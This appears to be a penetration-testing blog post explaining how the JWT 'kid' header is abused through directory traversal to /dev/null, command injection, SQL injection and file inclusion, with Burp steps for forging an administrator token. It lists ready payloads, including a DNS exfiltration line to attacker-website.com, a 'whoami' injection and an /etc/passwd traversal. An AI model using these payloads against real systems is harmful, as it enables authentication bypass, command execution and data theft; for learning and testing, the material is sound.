Skip to main content

JWT kid header exploitation


 

  • The exploitation of kid header in JWT (Directory Traversal and command Injection) (RS256 and HS256)
    kid = Key ID

As in the above exploitation, we have seen that we have replaced the kid value with our own kid value so that the server knows which public key should be used for the digital signature verification. 
kid or key id helps the server to identify which key should be used when verifying the signature.

Directory Traversal

This kid parameter exploitation only works when directory traversal is possible in the kid parameter. In the case of a symmetric hashing algorithm (HS256), it is more dangerous because we can traverse it to /dev/null, which is mostly present on most Linux systems and the value of this file is null as it is an empty file. Therefore, signing the token with a Base64-encoded null byte will result in a valid signature.
In an asymmetric (RS256) case, we have to find the file upload vulnerability or any method by which we are able to write our public key and then use the directory traversal to that file path.

For the “/dev/null” like value in the Windows system, you can refer to this. I have not tried in Windows. Post
If you try to create a file like this, it is never created. I think we can use this in the Windows system for a null byte.
echo 1 > nul
echo 1 > c:\nul

Command Injection

We can also check for the command injection issue, if possible, then we can go to the directory of the key file and run the HTTP server there. After that, we hit the domain name with that port and accessed that key file. It is helpful when the algorithm is symmetric (HS256). We can also do more things as command injection is working everything depends on the privileges that we have in the system.

Example of Command injection payload copied from Pentester academy


Payload: /root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337 &
“kid” : “1” | whoami;
“kid”: “kid;dig $(id | base64 -w0).attacker-website.com”

Also, check for the below vulnerabilities in the kid parameter:

SQL Injection
“kid” : “SELECT * FROM users WHERE username = ‘admin’-‘ AND password = ‘’”

Local File Inclusion
“kid” : “../../../etc/passwd”

Exploitation Steps (Symmetric HS256):
1. Capture the JWT request with the HS256 algorithm.
2. Send the request to the repeater
3. Navigate to “JWT EditorKeys” Burp extender
4. Click on “new Symmetric Key” → Click on “Generate” (Don’t need to select the key size)
5. Now, as we all know, we are going to sign our JWT token by Null character so for this, we need to change the value of “K” to the base64 of null. i.e (AA==) and click on Ok. Now you are thinking what exactly we are doing here? So we are signing our JWT token by null character and will point the kid value to /dev/null. So server takes the null value for creating the signature and both the signatures should look identical to the server. When the signature matches, then only our modified request is accepted by the server.

Default Value


6. Navigate back to the repeater request, and change the values, whatever you want according to the request. Like in the below screenshot I have changed the “Sub” from “Wiener” to “administrator” for the administrative privileges.
7. Use directory traversal to replace “kid” value to /dev/null. In my case it was “../../../../../../../dev/null”
8. Click on “sign” in the “JSON web token” Burp extender and sign it with the symmetric key that you have created in the earlier step.
9. Send the request and you will get a successful response if directory traversal is allowed in the “kid” parameter by the server and it is misconfigured.


JWT:
https://lazyhacker22.blogspot.com/2022/07/jwt-vulnerabilities-list-simple.html
https://lazyhacker22.blogspot.com/2022/06/what-is-jwt-json-web-tokens-simple.html
Labels:

Comments

Post a Comment

Popular posts from this blog

Free Cybersecurity Certifications

Introduction to Cybersecurity Cybersecurity Essentials Networking Essentials Android Bug Bounty Hunting: Hunt Like a Rat Ethical Hacking Essentials (EHE) Digital Forensics Essentials (DFE) Network Defense Essentials (NDE) Introduction to Dark Web, Anonymity, and Cryptocurrency AWS Skill Builder Introduction to Cybersecurity Building a Cybersecurity Toolkit Cyber Aces Free Cyber Security Training Course Introduction to Information Security Penetration Testing - Discovering Vulnerabilities
Post a Comment
Read more

Is your webcam exposed on the internet and everyone enjoying your personal moments? | How to check webcam or security camera is exposed on the internet or not?

Nowadays we start using many technology devices in our homes. Many people are installing CCTV or security cameras in their houses, private rooms, offices, private places, etc for security purposes and monitoring, but many of them don't know how to configure that device securely. So let's talk about CCTV and security cameras only.  What do most CCTV/Security camera users believe? Most users believe that using a strong username and password on a camera administrative page protects them. (Partially true in the case of online cameras) Example: Why it is partially true? It's partially true because you are protecting only the camera administrative page which is also an important part. Still, you are not protecting the protocol used to control streaming media servers (Real-Time Streaming Protocol ( RTSP )). I have seen many online webcams whose administrative page is secured by strong credentials, but they forget to secure the RTSP protocol which gives me access to the streaming ...
Post a Comment
Read more

Web Application Security Testing (WAPT) Interview Questions

Let's Contribute All Together For Creating a Questions Dump What are the vulnerabilities you have to test in the Login form, Payment gateway? What is clickjacking? What is the mitigation of clickjacking? What is CSRF? How to mitigate CSRF? Let's take an example, If a developer implements a CSRF token in a cookie, will it mitigate the CSRF issue? Is it possible to mitigate the CSRF by header? If yes why, if No why? If the data is in JSON format, how you will check the CSRF issue and what are the ways of exploitation? Where to implement the CSRF token and why? If the client doesn't want to change the UI or doesn't want to implement the CSRF tokens, and headers then what mitigation you recommended to the client for CSRF? What is the problem with the per-request token? Is login CSRF possible? Explain login CSRF? Have you ever exploited it? What is the mitigation for login CSRF? Suppose, in an application csrf token is implemented in each request and every request, except th...
Post a Comment
Read more